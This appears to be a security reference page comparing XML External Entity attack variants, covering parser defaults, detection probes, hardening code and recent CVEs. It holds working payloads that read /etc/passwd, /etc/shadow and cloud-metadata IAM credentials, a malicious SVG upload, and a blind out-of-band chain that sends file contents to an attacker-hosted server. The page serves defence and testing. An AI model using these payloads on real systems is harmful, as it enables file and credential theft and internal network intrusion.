Comparative overview of XML External Entity attack classes — file disclosure, SSRF, blind OOB, XInclude, DTD upload — with parser-specific behaviors and detection signals.
TL;DR
<xi:include> works when <!DOCTYPE is blocked; requires separate setXIncludeAware(false) in JavaXML External Entity (XXE) injection is not a single attack technique but a class of vulnerabilities stemming from one root cause: XML parsers that resolve external resources — files, URLs, internal services — when processing attacker-controlled XML. The W3C XML specification includes several features that enable this: DOCTYPE external entities, parameter entities for complex DTD composition, and XInclude for document assembly. Each of these mechanisms can be abused independently, creating five distinct attack variants with different payloads, different prerequisites, and different parser settings required for prevention.
Understanding the differences matters because security teams often harden against one variant while leaving others fully active. The most common gap is disabling DOCTYPE-based entities while leaving XInclude processing enabled — CVE-2025-31200 (LibreOffice, CVSS 7.1) is the canonical real-world example. A second gap is hardening direct XML API endpoints while leaving file upload processors (accepting SVG, docx, xlsx) uninspected.
XXE appears in OWASP A05:2021 (Security Misconfiguration) because every instance is a parser that was shipped or deployed with unsafe defaults and never hardened. It is not a logic vulnerability — the parser is doing exactly what the specification allows. The fix is configuration, not application code changes.
The common thread across all variants: the XML parser makes a network or filesystem request initiated by attacker-controlled content. Prevention requires eliminating the parser's ability to make these requests, not filtering the content of requests.
| Variant | CWE | Prerequisites | DOCTYPE Required | OOB Needed | Typical CVSS |
|---|---|---|---|---|---|
| Classic File Disclosure | CWE-611 | XML API, full document control | Yes | No | 7.5 |
| SSRF via XXE | CWE-611 | XML API, network access from server | Yes | No | 8.2 |
| Blind OOB XXE | CWE-611 | XML API, outbound from server | Yes | Yes | 7.5–8.3 |
| XInclude Injection | CWE-827 | Partial XML control (body position) | No | No | 7.1–7.5 |
| DTD Upload | CWE-611 | File upload (SVG/docx/xlsx/ODT) | Yes (in file) | No | 7.0–9.4 |
Different XML parsers have different defaults and different configuration APIs. Understanding parser-specific behavior is critical for both attack (knowing which parsers are vulnerable) and defense (knowing what to configure).
| Parser | External Entities Default | Disable External Entities | Disable XInclude |
|---|---|---|---|
| Java Xerces/JAXP | Enabled (pre-hardening) | setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) | setXIncludeAware(false) |
| libxml2 (C/PHP) | Enabled before v2.9.0; disabled by default v2.9.0+ | Do NOT pass LIBXML_NOENT (it enables entity substitution despite the name); for PHP 8.0+ use libxml_set_external_entity_loader(null) | Separate XML_PARSE_XINCLUDE flag |
| MSXML 6+ / .NET XmlReader | Enabled by default | VBScript/JScript: set ProhibitDTD = true; .NET: set XmlResolver = null on XmlDocument or DtdProcessing = DtdProcessing.Prohibit on XmlReaderSettings | Not natively supported |
| Python lxml | Enabled with resolve_entities=True | XMLParser(resolve_entities=False, no_network=True) | Never call .xinclude() on untrusted content |
| Python xml.etree | Safe for XXE (raises ExpatError on external entities; does NOT resolve them) — vulnerable to Billion Laughs DoS | Use defusedxml for full belt-and-suspenders (blocks DoS too) | N/A (no XInclude support) |
| .NET XmlDocument | Enabled by default | XmlResolver = null + DtdProcessing = DtdProcessing.Prohibit | Not natively supported |
| Node.js fast-xml-parser | Disabled v4+; enabled v3 | v4+ default safe; v3: processEntities: false | Not supported |
| PHP SimpleXML/DOM | Enabled (libxml2 backend) | libxml_set_external_entity_loader(null) (PHP 8.0+) | LIBXML_NOXINCNODE flag |
The simplest variant. The attacker controls a full XML document with DOCTYPE and injects a general external entity pointing to a local file:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>The server reflects entity content in the HTTP response. Requires in-band reflection — if the application processes the XML internally without returning entity values, this variant fails and Blind OOB must be used instead.
High-value targets beyond /etc/passwd: /proc/self/environ (runtime environment variables), /proc/self/cmdline (application startup command), application config files (/app/.env, config.yml, database.yml), SSH private keys (/root/.ssh/id_rsa).
See Classic File Disclosure for full payload library and detection evidence examples.
Replace the file:// URI with an http:// URI to pivot from XXE to Server-Side Request Forgery:
<!DOCTYPE foo [
<!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-role">
]>
<root>&ssrf;</root>The XML parser makes an HTTP GET request to the target URL and substitutes the response as the entity value. AWS IMDSv1 (no token required) is the canonical target. IMDSv2 requires a PUT request with X-aws-ec2-metadata-token-ttl-seconds header first — XXE general entities cannot send custom headers, so IMDSv2 provides partial mitigation. GCP's metadata.google.internal requires a Metadata-Flavor: Google header, similarly resistant to standard XXE SSRF.
CVE-2024-36522 (SAP BusinessObjects, CVSS 9.4) used XXE SSRF to traverse the internal network and reach administrative interfaces not exposed externally.
See SSRF via XXE for internal network scanning techniques and IMDSv2 bypass research.
The most prevalent variant in modern applications. The server parses XML and resolves entities, but the entity value is never returned in the HTTP response. Exploitation requires a two-stage parameter entity chain and attacker-controlled callback infrastructure:
<!-- Stage 1: payload delivered to target -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % sp SYSTEM "http://attacker.com/exfil.dtd">
%sp;
%param1;
]>
<root/><!-- exfil.dtd hosted on attacker.com -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://UNIQUE.oast.pro/?d=%file;'>">
%exfil;The target server fetches exfil.dtd, reads /etc/passwd, and makes an HTTP request to the attacker's Interactsh server carrying the file contents as a URL parameter. The HTTP response from the target contains no entity content.
CVE-2024-22024 (Ivanti Connect Secure, CVSS 8.3) — blind OOB in SAML AuthnRequest processing — was exploited against production VPN concentrators before a patch was available.
See Blind OOB for DNS exfiltration, FTP exfiltration (Java/Xerces WAF bypass), and error-based alternatives when egress is blocked.
XInclude injection bypasses DOCTYPE-based defenses entirely. Instead of DTD entity syntax, it uses W3C XInclude elements in the XML body — no DOCTYPE declaration is needed:
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>This applies when an attacker can inject XML content into a body position (element content, request parameter) but cannot control the document's DOCTYPE. It also applies when the application explicitly blocks DOCTYPE but processes XInclude — a common defense gap.
In Java JAXP, disallow-doctype-decl=true does not disable XInclude. setXIncludeAware(false) is a separate, independent setting that must be explicitly configured. CVE-2025-31200 (LibreOffice ODT, CVSS 7.1) is the cleanest published proof of this gap: DOCTYPE XXE was blocked; XInclude was not.
See XInclude Injection for xi:fallback enumeration technique and per-parser configuration details.
File upload endpoints that accept XML-based formats (SVG, docx, xlsx, ODT, WSDL) are an often-missed XXE surface. These formats are ZIP archives (docx/xlsx/ODT) or plain XML files (SVG/WSDL) containing DOCTYPE declarations:
<!-- Malicious SVG — submitted as an avatar/image upload -->
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]>
<svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg">
<text font-size="16">&xxe;</text>
</svg>When the server processes the uploaded file (thumbnail generation, document conversion, metadata extraction, virus scanning via Apache Tika), the embedded DOCTYPE entity is resolved. The disclosed content may appear in the HTTP response, in a generated thumbnail, in server logs, or only via OOB callback.
CVE-2025-66516 (Apache Tika, CVSS 10.0) — document ingestion pipelines using Tika for content extraction triggered XXE via PDF-embedded XFA forms and XML documents.
See DTD Upload for docx/xlsx manipulation techniques and Tika-specific payloads.
A single probe with an Interactsh token can detect all XXE variants simultaneously when submitted to both XML API endpoints and file upload endpoints:
Canary payload for XML API:
<?xml version="1.0"?>
<!DOCTYPE x [
<!ENTITY % sp SYSTEM "http://YOUR-TOKEN.oast.pro/xxe-api-probe">
%sp;
]>
<root/>Canary SVG for file upload:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY % sp SYSTEM "http://YOUR-TOKEN.oast.pro/xxe-upload-probe">
%sp;
]>
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1"/>XInclude canary (run after DOCTYPE probe returns 400):
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="http://YOUR-TOKEN.oast.pro/xinclude-probe"/>
</root>Monitor Interactsh for DNS and HTTP callbacks. A DNS-only callback is POTENTIAL (confidence 0.30); an HTTP callback is CONFIRMED (confidence 0.75+); an HTTP callback with file content in URL parameters is CONFIRMED HIGH (0.98).
Prevention requires hardening each parser independently. The universal principle: disable external entity resolution and XInclude processing before accepting attacker-controlled XML.
// Java JAXP — covers classic XXE + SSRF + blind OOB + DTD upload
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false); // SEPARATE flag — prevents XInclude injection
dbf.setExpandEntityReferences(false);# Python — defusedxml for ElementTree; lxml requires explicit config
from defusedxml import ElementTree as ET
tree = ET.fromstring(xml_input) # safe by default
# lxml — must configure explicitly
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)
tree = etree.fromstring(xml_bytes, parser=parser)
# Never call tree.xinclude() on untrusted content// .NET — XmlResolver = null prevents all external fetch
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null
};
using var reader = XmlReader.Create(stream, settings);<?php
// PHP 8.0+ — null loader blocks all external entity resolution
libxml_set_external_entity_loader(null);
$doc = new DOMDocument();
$doc->loadXML($xml);Defense gap: Most hardening guides cover only DOCTYPE-based XXE. XInclude requires a separate parser flag (setXIncludeAware(false) in Java, avoiding .xinclude() in Python lxml). File upload processors require the same hardening as XML API endpoints — Apache Tika, LibreOffice conversion services, and ImageMagick SVG renderers all parse XML internally and require explicit configuration.
CVE-2025-66516 — Apache Tika (CVSS 10.0, 2025)
Apache Tika's document content extraction, used in enterprise search platforms, AI RAG pipelines, and document management systems, triggered XXE via XFA-embedded XML in PDF documents and via XInclude in certain document types. Unauthenticated document uploads are common in these systems. The CVSS 10.0 score reflects the broad deployment surface — Tika is a transitive dependency in thousands of Java applications.
CVE-2024-22024 — Ivanti Connect Secure (CVSS 8.3, 2024)
Ivanti's SAML endpoint processed XML AuthnRequests with blind OOB XXE capability. The server made outbound HTTP requests when resolving parameter entities in attacker-crafted SAML assertions. Combined with CVE-2023-46805 (authentication bypass), attackers achieved unauthenticated blind OOB XXE against production VPN concentrators globally. This CVE appeared in CISA KEV and was exploited in the wild before patching.
CVE-2025-31200 — LibreOffice XInclude (CVSS 7.1, 2025)
The canonical defense-gap example. LibreOffice had blocked DOCTYPE-based XXE in ODT processing. The XInclude code path was left enabled. Malicious ODT files with xi:include elements disclosed files when documents were opened or processed by automated conversion services. Patched in LibreOffice 25.2.3.
Blind OOB XXE is the most prevalent in contemporary applications. Modern API responses rarely reflect raw XML entity values — the XML is parsed internally without the entity content appearing in the HTTP response. This means most real-world XXE vulnerabilities require out-of-band techniques (DNS or HTTP callbacks via Interactsh or Burp Collaborator) for exploitation confirmation, not classic in-band file disclosure.
XInclude injection (CWE-827) bypasses filters that block or disable DOCTYPE declarations. XInclude uses namespace-qualified XML elements (<xi:include href='file:///etc/passwd' parse='text'/>) instead of DTD entity syntax. A parser with DOCTYPE disabled but XInclude awareness enabled — a common misconfiguration — is fully vulnerable. CVE-2025-31200 (LibreOffice, CVSS 7.1) confirmed this defense gap.
libxml2 versions before 2.9.0 (2012) resolve external entities by default. Java Xerces/JAXP prior to explicit feature hardening resolves external entities. PHP's SimpleXML and DOM extension (backed by libxml2) enable external entities unless libxml_disable_entity_loader(true) is set (deprecated PHP 8.0+) or LIBXML_NOENT is avoided. Python's xml.etree.ElementTree does not process external entities by default, but lxml does unless configured with no_network=True. Node.js fast-xml-parser v4+ disables DTD by default; v3 and earlier enabled it.
XXE SSRF works by setting the external entity URI to an HTTP URL: <!ENTITY ssrf SYSTEM 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'>. The XML parser makes an HTTP request to the URL and substitutes the response content. Primary targets: AWS IMDSv1 (169.254.169.254), GCP metadata (metadata.google.internal), Azure IMDS (169.254.169.254/metadata/instance), internal Kubernetes API (10.96.0.1:443), Redis (127.0.0.1:6379), internal admin panels. IMDSv2 (token-required) partially mitigates cloud metadata theft.
CWE-611 (Improper Restriction of XML External Entity Reference) covers classic XXE via DOCTYPE external entities and parameter entities. CWE-827 (Improper Control of Document Type Definition) covers XInclude injection — a related but distinct code path using W3C XInclude elements rather than DTD syntax. Both result in file disclosure and SSRF but require different parser settings to prevent. Scanning tools that only check for CWE-611 patterns will miss CWE-827 XInclude injection.
Key recent CVEs: CVE-2024-22024 (Ivanti Connect Secure SAML, CVSS 8.3) — OOB XXE in VPN concentrators. CVE-2025-31200 (LibreOffice, CVSS 7.1) — XInclude in ODT processing. CVE-2025-66516 (Apache Tika, CVSS 10.0) — XFA/XInclude in document ingestion pipelines. CVE-2024-40896 (libxml2 SAX handler bypass, CVSS 7.5) — believed-protected applications still resolving entities. CVE-2024-36522 (SAP BusinessObjects, CVSS 9.4) — SOAP endpoint XXE enabling internal network traversal.
Use a multi-vector probe sequence: (1) DOCTYPE entity with Interactsh token for classic/blind OOB; (2) xi:include with Interactsh token for XInclude; (3) file upload with malicious SVG containing both DOCTYPE and xi:include for DTD upload. Monitor Interactsh for DNS and HTTP callbacks. Any callback from the target IP/ASN confirms at least one variant. Use Burp Suite Pro active scanner as a first pass, then apply manual probes for XInclude and upload vectors that automated scanners miss.
JSON-only endpoints are not vulnerable to classic XXE. However, applications that accept both JSON and XML (via Content-Type negotiation), process SOAP envelopes internally, or parse XML documents from user-uploaded files (docx, xlsx, SVG, ODT, PPTX) remain vulnerable regardless of the API surface. File upload endpoints accepting structured file formats are a common overlooked XXE surface — all Office Open XML formats (docx/xlsx/pptx) are ZIP archives containing XML that is parsed on the server.
Inline XXE injects entities directly in a request body containing XML. DTD Upload XXE works through file upload endpoints that accept structured XML-based file formats: SVG images, docx/xlsx Office documents, XML configuration files, WSDL documents. The attacker crafts a malicious file (e.g., an SVG with an embedded DOCTYPE entity) and uploads it via a standard file upload form. The server-side processor parses the uploaded file and resolves the entities, disclosing files or making SSRF requests without the attacker having direct access to an XML API endpoint.
For Java (the most commonly hardened runtime): setting setFeature('http://apache.org/xml/features/disallow-doctype-decl', true) prevents classic XXE, SSRF via XXE, and blind OOB. ADDITIONALLY, setXIncludeAware(false) prevents XInclude injection — this is a separate flag not implied by the DOCTYPE feature. For Python: use defusedxml for all ElementTree operations; for lxml, set no_network=True and never call xinclude() on untrusted content. For PHP: use libxml_set_external_entity_loader(null) (PHP 8.0+). For .NET: set XmlResolver = null and DtdProcessing = DtdProcessing.Prohibit.
Classic file disclosure (/etc/passwd read) typically yields P3-P4. Reading application secrets (/app/.env, database credentials) escalates to P1-P2. SSRF via XXE reaching cloud metadata (IAM credentials) is P1 due to potential full account takeover. Blind OOB XXE without demonstrated data exfiltration is P3; with exfiltrated credentials is P1. XInclude injection without demonstrated impact is P3. DTD Upload XXE via SVG in an avatar upload is typically P3-P4 unless chained to credential disclosure. HackerOne reports #1379577 and #293795 both resulted in P3 awards.